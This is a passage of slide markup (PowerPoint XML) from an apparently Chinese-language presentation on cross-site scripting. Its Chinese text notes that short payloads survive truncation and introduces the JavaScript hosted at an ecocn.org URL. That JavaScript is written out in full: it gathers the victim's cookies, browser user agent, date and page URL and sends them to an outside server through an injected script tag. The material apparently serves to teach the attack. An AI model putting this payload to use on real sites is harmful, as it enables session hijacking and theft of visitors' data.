            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>内容越短越好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>因为显示的时候会截取一段下来</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://ecocn.org/1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>代码如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>d=document;s=d.createElement("script");</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>data=d.cookie+'----'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>+navigator.userAgent+'-----'+new Date()+'----'+encodeURIComponent(location.href);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>s.src="http://ecocn.org/phpinfo.php?data="+data;d.body.appendChild(s);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